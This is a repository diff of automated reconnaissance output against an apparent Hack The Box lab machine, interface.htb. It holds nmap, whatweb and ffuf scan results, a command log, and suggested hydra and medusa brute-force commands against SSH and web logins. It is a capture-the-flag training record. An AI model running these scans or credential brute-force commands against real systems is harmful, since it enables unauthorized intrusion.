+|     libwww
+|     lwp-trivial
+|     libcurl-agent/1.0
+|     PHP/
+|     Python-urllib/2.5
+|     GT::WWW
+|     Snoopy
+|     MFC_Tear_Sample
+|     HTTP::Lite
+|     PHPCrawl
+|     URI::Fetch
+|     Zend_Http_Client
+|     http client
+|     PECL::HTTP
+|     Wget/1.13.4 (linux-gnu)
+|_    WWW-Mechanize/1.34
+|_http-fetch: Please enter the complete path of the directory to save data in.
+|_http-config-backup: ERROR: Script execution failed (use -d to debug)
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+|_http-chrono: Request times for /; avg: 270.73ms; min: 153.90ms; max: 523.51ms
+| http-wordpress-enum: 
+| Search limited to top 100 themes/plugins
+|   plugins
+|     akismet
+|     contact-form-7
+|     wordpress-seo
+|     jetpack
+|     all-in-one-seo-pack
+|     wordfence
+|     woocommerce
+|     google-sitemap-generator
+|     wordpress-importer
+|     nextgen-gallery
+|     google-analytics-for-wordpress
+|     wp-super-cache
+|     tinymce-advanced
+|     wptouch
+|     better-wp-security
+|     siteorigin-panels
+|     updraftplus
+|     w3-total-cache
+|     google-analytics-dashboard-for-wp
+|     wp-pagenavi
+|     si-contact-form
+|     advanced-custom-fields
+|     mailchimp-for-wp
+|     the-events-calendar
+|     add-to-any
+|     duplicator
+|     wysija-newsletters
+|     ninja-forms
+|     wp-smushit
+|     buddypress
+|     ewww-image-optimizer
+|     so-widgets-bundle
+|     really-simple-captcha
+|     ml-slider
+|     black-studio-tinymce-widget
+|     photo-gallery
+|     broken-link-checker
+|     regenerate-thumbnails
+|     google-analyticator
+|     redirection
+|     captcha
+|     duplicate-post
+|     breadcrumb-navxt
+|     backwpup
+|     user-role-editor
+|     yet-another-related-posts-plugin
+|     contact-form-plugin
+|     newsletter
+|     bbpress
+|     all-in-one-wp-security-and-firewall
+|     disable-comments
+|     social-networks-auto-poster-facebook-twitter-g
+|     wp-optimize
+|     addthis
+|     wp-statistics
+|     wp-e-commerce
+|     all-in-one-wp-migration
+|     backupwordpress
+|     si-captcha-for-wordpress
+|     wp-slimstat
+|     wp-google-maps
+|     wp-spamshield
+|     wp-maintenance-mode
+|     googleanalytics
+|     worker
+|     yith-woocommerce-wishlist
+|     wp-multibyte-patch
+|     wp-to-twitter
+|     image-widget
+|     wp-db-backup
+|     shortcodes-ultimate
+|     ultimate-tinymce
+|     share-this
+|     disqus-comment-system
+|     gallery-bank
+|     types
+|     wp-polls
+|     custom-post-type-ui
+|     shareaholic
+|     polylang
+|     post-types-order
+|     gtranslate
+|     bulletproof-security
+|     wp-fastest-cache
+|     facebook
+|     sociable
+|     iwp-client
+|     nextgen-facebook
+|     seo-ultimate
+|     wp-postviews
+|     formidable
+|     squirrly-seo
+|     wp-mail-smtp
+|     tablepress
+|     redux-framework
+|     page-links-to
+|     youtube-embed-plus
+|     contact-bank
+|     maintenance
+|     wp-retina-2x
+|   themes
+|     twentyeleven
+|     twentytwelve
+|     twentyten
+|     twentythirteen
+|     twentyfourteen
+|     twentyfifteen
+|     responsive
+|     customizr
+|     zerif-lite
+|     virtue
+|     storefront
+|     atahualpa
+|     twentysixteen
+|     vantage
+|     hueman
+|     spacious
+|     evolve
+|     colorway
+|     graphene
+|     sydney
+|     ifeature
+|     mh-magazine-lite
+|     generatepress
+|     mantra
+|     omega
+|     onetone
+|     coraline
+|     pinboard
+|     thematic
+|     sparkling
+|     catch-box
+|     make
+|     colormag
+|     enigma
+|     custom-community
+|     mystique
+|     alexandria
+|     delicate
+|     lightword
+|     attitude
+|     inove
+|     magazine-basic
+|     raindrops
+|     minamaze
+|     zbench
+|     point
+|     eclipse
+|     portfolio-press
+|     twentyseventeen
+|     travelify
+|     swift-basic
+|     iconic-one
+|     arcade-basic
+|     bouquet
+|     pixel
+|     sliding-door
+|     pilcrow
+|     simple-catch
+|     tempera
+|     destro
+|     p2
+|     sunspot
+|     sundance
+|     dusk-to-dawn
+|     onepress
+|     moesia
+|     dynamic-news-lite
+|     parabola
+|     parament
+|     dazzling
+|     accesspress-lite
+|     optimizer
+|     one-page
+|     chaostheory
+|     business-lite
+|     duster
+|     constructor
+|     nirvana
+|     sixteen
+|     esquire
+|     beach
+|     next-saturday
+|     flat
+|     hatch
+|     minimatica
+|     radiate
+|     accelerate
+|     oxygen
+|     accesspress-parallax
+|     swift
+|     spun
+|     wp-creativix
+|     suevafree
+|     hemingway
+|     pink-touch-2
+|     motion
+|     fruitful
+|     steira
+|     news
+|_    llorix-one-lite
+|_http-dombased-xss: Couldn't find any DOM based XSS.
+| http-security-headers: 
+|   Content_Security_Policy: 
+|     Header: Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
+|     Description: Define which scripts the protected resource can execute.
+|     Description: Define which styles (CSS) the user applies to the protected resource.
+|     Description: Define from where the protected resource can load images.
+|     Description: Define from where the protected resource can embed frames.
+|_    Description: Define which URIs the protected resource can load using script interfaces.
+| http-headers: 
+|   Server: nginx/1.14.0 (Ubuntu)
+|   Date: Sat, 11 Feb 2023 19:04:44 GMT
+|   Content-Type: text/html; charset=utf-8
+|   Content-Length: 6359
+|   Connection: close
+|   Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
+|   X-Powered-By: Next.js
+|   ETag: "i8ubiadkff4wf"
+|   Vary: Accept-Encoding
+|   
+|_  (Request type: HEAD)
+|_http-referer-checker: Couldn't find any cross-domain scripts.
+|_http-feed: Couldn't find any feeds.
+|_http-comments-displayer: Couldn't find any comments.
+|_http-csrf: Couldn't find any CSRF vulnerabilities.
+|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
+|_http-title: Site Maintenance
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:06:23 2023 -- 1 IP address (1 host up) scanned in 113.44 seconds
+
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/Virtual Host Enumeration.md

@@ -0,0 +1,11 @@
+```bash
+curl -sk -o /dev/null -H "Host: wrkVpqvNoUJwGPBtPTqT.interface.htb" http://interface.htb:80/ -w "%{size_download}"
+``````bash
+ffuf -u http://interface.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.interface.htb" -fs 6359 -noninteractive -s | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_interface.htb_vhosts_subdomains-top1million-110000.txt"
+```
+
+[/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_interface.htb_vhosts_subdomains-top1million-110000.txt](file:///home/simon/htb/interface/results/scans/tcp80/tcp_80_http_interface.htb_vhosts_subdomains-top1million-110000.txt):
+
+```
+
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/whatweb.md

@@ -0,0 +1,84 @@
+```bash
+whatweb --color=never --no-errors -a 3 -v http://interface.htb:80 2>&1
+```
+
+[/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/simon/htb/interface/results/scans/tcp80/tcp_80_http_whatweb.txt):
+
+```
+WhatWeb report for http://interface.htb:80
+Status    : 200 OK
+Title     : <None>
+IP        : 10.129.146.193
+Country   : RESERVED, ZZ
+
+Summary   : Email[contact@interface.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], nginx[1.14.0], Script[application/json], UncommonHeaders[content-security-policy], X-Powered-By[Next.js]
+
+Detected Plugins:
+[ Email ]
+	Extract email addresses. Find valid email address and
+	syntactically invalid email addresses from mailto: link
+	tags. We match syntactically invalid links containing
+	mailto: to catch anti-spam email addresses, eg. bob at
+	gmail.com. This uses the simplified email regular
+	expression from
+	http://www.regular-expressions.info/email.html for valid
+	email address matching.
+
+	String       : contact@interface.htb
+	String       : contact@interface.htb
+
+[ HTML5 ]
+	HTML version 5, detected by the doctype declaration
+
+
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	OS           : Ubuntu Linux
+	String       : nginx/1.14.0 (Ubuntu) (from server string)
+
+[ Script ]
+	This plugin detects instances of script HTML elements and
+	returns the script language/type.
+
+	String       : application/json
+
+[ UncommonHeaders ]
+	Uncommon HTTP server headers. The blacklist includes all
+	the standard headers and many non standard but common ones.
+	Interesting but fairly common headers should have their own
+	plugins, eg. x-powered-by, server and x-aspnet-version.
+	Info about headers can be found at www.http-stats.com
+
+	String       : content-security-policy (from headers)
+
+[ X-Powered-By ]
+	X-Powered-By HTTP header
+
+	String       : Next.js (from x-powered-by string)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.14.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 200 OK
+	Server: nginx/1.14.0 (Ubuntu)
+	Date: Sat, 11 Feb 2023 19:04:51 GMT
+	Content-Type: text/html; charset=utf-8
+	Transfer-Encoding: chunked
+	Connection: close
+	Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
+	X-Powered-By: Next.js
+	ETag: "i8ubiadkff4wf"
+	Vary: Accept-Encoding
+	Content-Encoding: gzip
+
+
+
+```

HTB/interface/results/report/report.md/interface.htb/Services/Service - tcp-80-http/wkhtmltoimage.md

@@ -0,0 +1,3 @@
+```bash
+wkhtmltoimage --format png http://interface.htb:80/ /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_screenshot.png
+```

HTB/interface/results/scans/_commands.log

@@ -0,0 +1,26 @@
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml" interface.htb
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/htb/interface/results/scans/_full_tcp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml" interface.htb
+
+nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt" -oX "/home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml" interface.htb
+
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" interface.htb
+
+feroxbuster -u http://interface.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
+
+curl -sSikf http://interface.htb:80/.well-known/security.txt
+
+curl -sSikf http://interface.htb:80/robots.txt
+
+curl -sSik http://interface.htb:80/
+
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/htb/interface/results/scans/tcp80/xml/tcp_80_http_nmap.xml" interface.htb
+
+curl -sk -o /dev/null -H "Host: wrkVpqvNoUJwGPBtPTqT.interface.htb" http://interface.htb:80/ -w "%{size_download}"
+
+whatweb --color=never --no-errors -a 3 -v http://interface.htb:80 2>&1
+
+wkhtmltoimage --format png http://interface.htb:80/ /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_screenshot.png
+
+ffuf -u http://interface.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.interface.htb" -fs 6359 -noninteractive -s | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_interface.htb_vhosts_subdomains-top1million-110000.txt"
+

HTB/interface/results/scans/_full_tcp_nmap.txt

@@ -0,0 +1,53 @@
+# Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/htb/interface/results/scans/_full_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml interface.htb
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.060s latency).
+Scanned at 2023-02-11 20:04:00 CET for 48s
+Not shown: 65533 closed tcp ports (reset)
+PORT   STATE SERVICE REASON         VERSION
+22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH
+|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
+|   256 cc62905560a658629e6b80105c799b55 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
+80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
+|_http-title: Site Maintenance
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
+Aggressive OS guesses: Linux 5.0 (93%), Linux 5.4 (93%), Linux 5.0 - 5.4 (93%), HP P2000 G3 NAS device (91%), Linux 4.15 - 5.6 (91%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 5.0 - 5.3 (90%)
+No exact OS matches for host (test conditions non-ideal).
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=2/11%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E7E6D0%P=x86_64-pc-linux-gnu)
+SEQ(SP=FE%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
+OPS(O1=M569ST11NW7%O2=M569ST11NW7%O3=M569NNT11NW7%O4=M569ST11NW7%O5=M569ST11NW7%O6=M569ST11)
+WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
+ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M569NNSNW7%CC=Y%Q=)
+T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
+T2(R=N)
+T3(R=N)
+T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
+T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+T7(R=N)
+U1(R=N)
+IE(R=Y%DFI=N%TG=40%CD=S)
+
+Uptime guess: 18.717 days (since Tue Jan 24 02:52:54 2023)
+Network Distance: 2 hops
+TCP Sequence Prediction: Difficulty=254 (Good luck!)
+IP ID Sequence Generation: All zeros
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 53/tcp)
+HOP RTT      ADDRESS
+1   77.01 ms 10.10.16.1
+2   77.09 ms interface.htb (10.129.146.193)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:04:48 2023 -- 1 IP address (1 host up) scanned in 49.84 seconds

HTB/interface/results/scans/_manual_commands.txt

@@ -0,0 +1,32 @@
+[*] ssh on tcp/22
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://interface.htb
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h interface.htb
+
+[*] http on tcp/80
+
+	[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
+
+		feroxbuster -u http://interface.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
+
+	[-] Credential bruteforcing commands (don't run these without modifying them):
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://interface.htb/path/to/auth/area
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h interface.htb -m DIR:/path/to/auth/area
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://interface.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h interface.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
+
+	[-] (nikto) old but generally reliable web server enumeration tool:
+
+		nikto -ask=no -h http://interface.htb:80 2>&1 | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nikto.txt"
+
+	[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
+
+		wpscan --url http://interface.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/htb/interface/results/scans/tcp80/tcp_80_http_wpscan.txt"
+

HTB/interface/results/scans/_patterns.log

@@ -0,0 +1,4 @@
+Matched Pattern: Powered-By: Next.js
+
+Identified HTTP Server: nginx/1.14.0 (Ubuntu)
+

HTB/interface/results/scans/_quick_tcp_nmap.txt

@@ -0,0 +1,60 @@
+# Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml interface.htb
+adjust_timeouts2: packet supposedly had rtt of -223229 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -223229 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -541797 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -541797 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -189731 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -189731 microseconds.  Ignoring time.
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.054s latency).
+Scanned at 2023-02-11 20:04:00 CET for 29s
+Not shown: 998 closed tcp ports (reset)
+PORT   STATE SERVICE REASON         VERSION
+22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
+|   256 cc62905560a658629e6b80105c799b55 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
+80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
+|_http-title: Site Maintenance
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+Device type: general purpose
+Running (JUST GUESSING): Linux 5.X|2.6.X|4.X (88%)
+OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:4
+OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
+Aggressive OS guesses: Linux 5.0 (88%), Linux 5.0 - 5.4 (88%), Linux 2.6.32 (88%), Linux 5.4 (86%), Linux 4.15 - 5.6 (85%)
+No exact OS matches for host (test conditions non-ideal).
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=2/11%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E7E6BD%P=x86_64-pc-linux-gnu)
+SEQ(SP=105%GCD=1%ISR=10C%TI=Z%TS=A)
+OPS(O1=M569ST11NW7%O2=M569ST11NW7%O3=M569NNT11NW7%O4=M569ST11NW7%O5=M569ST11NW7%O6=M569ST11)
+WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
+ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M569NNSNW7%CC=Y%Q=)
+T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
+T2(R=N)
+T3(R=N)
+T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
+T6(R=N)
+T7(R=N)
+U1(R=N)
+IE(R=Y%DFI=N%TG=40%CD=S)
+
+Uptime guess: 18.716 days (since Tue Jan 24 02:52:54 2023)
+Network Distance: 2 hops
+TCP Sequence Prediction: Difficulty=261 (Good luck!)
+IP ID Sequence Generation: All zeros
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 1720/tcp)
+HOP RTT      ADDRESS
+1   58.77 ms 10.10.16.1
+2   71.96 ms interface.htb (10.129.146.193)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:04:29 2023 -- 1 IP address (1 host up) scanned in 31.39 seconds

HTB/interface/results/scans/_top_100_udp_nmap.txt

@@ -0,0 +1,45 @@
+# Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/htb/interface/results/scans/_top_100_udp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_top_100_udp_nmap.xml interface.htb
+Warning: 10.129.146.193 giving up on port because retransmission cap hit (6).
+Increasing send delay for 10.129.146.193 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
+Increasing send delay for 10.129.146.193 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
+Increasing send delay for 10.129.146.193 from 400 to 800 due to 11 out of 12 dropped probes since last increase.
+adjust_timeouts2: packet supposedly had rtt of -432739 microseconds.  Ignoring time.
+adjust_timeouts2: packet supposedly had rtt of -432739 microseconds.  Ignoring time.
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.035s latency).
+Scanned at 2023-02-11 20:04:01 CET for 231s
+Not shown: 87 closed udp ports (port-unreach)
+PORT      STATE         SERVICE        REASON      VERSION
+17/udp    open|filtered qotd           no-response
+68/udp    open|filtered dhcpc          no-response
+80/udp    open|filtered http           no-response
+177/udp   open|filtered xdmcp          no-response
+593/udp   open|filtered http-rpc-epmap no-response
+631/udp   open|filtered ipp            no-response
+1029/udp  open|filtered solid-mux      no-response
+1719/udp  open|filtered h323gatestat   no-response
+3703/udp  open|filtered adobeserver-3  no-response
+4444/udp  open|filtered krb524         no-response
+32815/udp open|filtered unknown        no-response
+49154/udp open|filtered unknown        no-response
+65024/udp open|filtered unknown        no-response
+Too many fingerprints match this host to give specific OS details
+TCP/IP fingerprint:
+SCAN(V=7.93%E=4%D=2/11%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63E7E788%P=x86_64-pc-linux-gnu)
+SEQ(CI=Z%II=I)
+SEQ(CI=Z)
+T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
+T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
+U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
+IE(R=Y%DFI=N%T=40%CD=S)
+
+Network Distance: 2 hops
+
+TRACEROUTE (using port 49192/udp)
+HOP RTT      ADDRESS
+1   33.86 ms 10.10.16.1
+2   33.95 ms interface.htb (10.129.146.193)
+
+Read data files from: /usr/bin/../share/nmap
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:07:52 2023 -- 1 IP address (1 host up) scanned in 233.62 seconds

HTB/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt

@@ -0,0 +1,63 @@
+# Nmap 7.93 scan initiated Sat Feb 11 20:04:30 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml interface.htb
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.020s latency).
+Scanned at 2023-02-11 20:04:30 CET for 3s
+
+PORT   STATE SERVICE REASON         VERSION
+22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
+| ssh-auth-methods: 
+|   Supported authentication methods: 
+|     publickey
+|_    password
+| ssh-hostkey: 
+|   2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH
+|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
